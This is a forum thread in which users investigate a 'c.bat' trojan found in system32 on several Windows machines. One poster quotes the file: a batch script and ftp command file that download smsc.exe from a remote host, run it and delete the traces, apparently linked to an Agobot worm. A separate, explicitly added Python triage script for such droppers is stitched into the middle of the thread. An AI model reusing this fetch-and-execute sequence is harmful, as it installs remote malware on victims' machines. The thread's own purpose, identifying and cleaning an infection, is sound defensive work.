"c.bat" trojan


Branden Wolner

Hi,

NAV found this trojan on one of our computers recently. It was in the
system32 folder and was called "c.bat". It contained command line code that
turned the echo off and then executed an FTP command (I did not write down
the entire command) and then self-erased. NAV could not clean or delete the
file, and when we hit "ok" it redetected it. NAV 8.0 BTW. I had to disable
auto protect, reboot, and then manually delete the file. I have no idea
where it came from as we had just wiped the entire hard drive and
reinstalled XP from the CD, followed by NAV and a live update of NAV.
Clearly, the trojan is designed to exploit someone mistyping "c:" at the
command prompt. Cannot find any info at Symantec, McAfee or by Google
search. Anyone know anything about this? Where it comes from? We did have
an open DSL connection at the time it was found. Any info would be
appreciated. Thanks.
 
I know it's closing the barn door after the horse is out;
no pun intended, but, spend the 24.95 and buy Trojan
Remover from Simply Super Software on-line. It renames
the Trojan (so it can be cleaned and deleted) and deletes
it automatically when you scan. I also learned the hard
way.
 
Thanks but since it was never executed, it's not a problem. My real need
is to know how it got on the computer - where it came from. As I said, we
installed XP from CD-ROM, then installed Verizon DSL, then NAV 8.0
followed by live update. Then we installed SP1 from windowsupdate. Then
all other updates/patches/fixes. Somewhere along the line, this file
showed up in the c:\windows\system32 folder. How and why?
 
If the file is still in your recycle bin, restore it.
Then right-click it (don't left-click!!) and choose edit.
Press ctrl-a, ctrl-c to copy it to the clipboard and paste its code in here,
and we can tell you what it does, which may also provide clues as to its
origin.

Jon
 
Our whole company has this popping up all over. Symantec detects it,
but I can't figure out where it is coming from. It says file
c:\winnt\system32\c.bat is infected with bat.trojan, but Symantec's
website has no info on that particular virus, only 2 other
bat.trojan.xxx files that are very old.
 
If the file is still in your recycle bin, restore it.
Then right-click it (don't left-click!!) and choose edit.
Press ctrl-a, ctrl-c to copy it to the clipboard and paste its code in
here, and we can tell you what it does, which may also provide clues
as to its origin.

Thanks but it's gone now. Maybe someone else has gotten it and can paste
the code here?
 
Branden Wolner said:
Thanks but it's gone now. Maybe someone else has gotten it and can paste
the code here?

I am seeing similar behavior on the network, Norton detecting the
c.bat, but not the source that is creating it. I opened the c.bat
file, and here are the contents:

@echo off
ftp -n -v -s:.pif
smsc.exe
del .pif

The .pif file contains the FTP commands:

open 0.0.0.0 18454
user a a
binary
GET smsc.exe
bye

I haven't found smsc.exe on any of the systems on our network yet.
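For anyone triaging a copy of this dropper, the following is an added example (not code from the thread or from any vendor) that parses a c.bat-style batch file together with the ftp -s: script it references and reports the download host, port, credentials, which fetched file the batch runs, and which files it deletes afterwards. The sample inputs are constructed from the listing above; the 0.0.0.0 address is the same placeholder used in the post.

```python
import re

# Constructed samples modelled on the c.bat / .pif pair quoted in the thread
# (the 0.0.0.0 address is a placeholder, exactly as in the post).
SAMPLE_BAT = "@echo off\nftp -n -v -s:.pif\nsmsc.exe\ndel .pif\n"
SAMPLE_PIF = "open 0.0.0.0 18454\nuser a a\nbinary\nGET smsc.exe\nbye\n"


def parse_ftp_script(text):
    """Extract host, port, user and fetched file names from an 'ftp -s:' script."""
    info = {"host": None, "port": 21, "user": None, "fetched": []}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) > 1:
            info["host"] = parts[1]
            if len(parts) > 2 and parts[2].isdigit():
                info["port"] = int(parts[2])
        elif cmd == "user" and len(parts) > 1:
            info["user"] = parts[1]
        elif cmd in ("get", "mget") and len(parts) > 1:
            info["fetched"] += [p.lower() for p in parts[1:]]
    return info


def triage_dropper(bat_text, scripts):
    """Flag the download -> execute -> cleanup pattern; scripts maps name -> contents."""
    lines = [l.strip() for l in bat_text.splitlines() if l.strip()]
    result = {"ftp": [], "executed": [], "deleted": []}
    fetched = set()
    for line in lines:
        m = re.match(r"ftp\b.*-s:(\S+)", line, re.IGNORECASE)
        if m:
            name = m.group(1)
            info = parse_ftp_script(scripts.get(name, ""))
            info["script"] = name
            result["ftp"].append(info)
            fetched.update(info["fetched"])
    for line in lines:
        first = line.split()[0].lower()
        if first in fetched:  # bare invocation of a file the ftp script fetched
            result["executed"].append(first)
        elif first == "del":  # self-cleanup of the script (or anything else)
            result["deleted"] += [t.lower() for t in line.split()[1:]]
    return result


if __name__ == "__main__":
    print(triage_dropper(SAMPLE_BAT, {".pif": SAMPLE_PIF}))
```

A hit on a batch file that both executes and deletes what its ftp script fetched is a strong indicator worth feeding to whatever is watching system32 for new files.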
 
(e-mail address removed) (Ross Brown) wrote in
I am seeing similar behavior on the network, Norton detecting the
c.bat, but not the source that is creating it. I opened the c.bat
file, and here are the contents:

@echo off
ftp -n -v -s:.pif
smsc.exe
del .pif

The .pif file contains the FTP commands:

open 0.0.0.0 18454
user a a
binary
GET smsc.exe
bye

I haven't found smsc.exe on any of the systems on our network yet.

Interesting info here:
http://uk.trendmicro-europe.com/enterprise/security_info/ve_detail.php?VName=WORM_AGOBOT.WF
 
Post this in the virus newsgroup or do a search for it on Google.

--
Regards:

Richard Urban

aka Crusty (-: Old B@stard :-)
 